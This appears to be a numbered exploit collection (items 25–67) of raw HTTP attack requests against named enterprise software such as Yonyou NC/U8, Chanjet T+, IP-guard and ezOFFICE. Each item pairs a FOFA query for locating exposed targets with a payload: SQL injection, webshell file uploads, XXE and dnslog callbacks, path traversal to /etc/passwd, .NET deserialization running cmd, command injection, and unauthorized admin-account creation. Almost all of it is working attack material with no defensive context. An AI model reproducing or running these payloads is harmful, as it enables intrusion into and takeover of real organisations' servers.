25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg
------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
version: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo endpoint SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855
------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
1231
Content-Type: application/octet-stream
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"
upload
------269520967239406871642430066855--

49. Yonyou U8 CRM uploadfile.php endpoint arbitrary file upload
FOFA:body="用友U8CRM"
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. 云时空 social commerce ERP system validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPtech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target; it executes a command that writes the given string into the given file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: visit the following URL:
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the endpoint
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: using the obtained Cookie, request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}

57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. 百卓 Smart management platform importexport.php SQL injection
FOFA:title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. 浙大恩特 customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚 management information system CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. 优卡特 脸爱云一脸通 smart management platform 1.0.55.0.0.1 authorization bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created successfully.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. 万户 (Wanhu) ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Lines 42 and 43 of the response containing the string 6cfe798ba8e5b85feb50164c59f4bec9 confirm that the vulnerability exists.

67. 万户 (Wanhu) ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
The newdocId and filename parameters give the name of the written file, the dir parameter gives its path, and the fileType parameter gives its file type.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
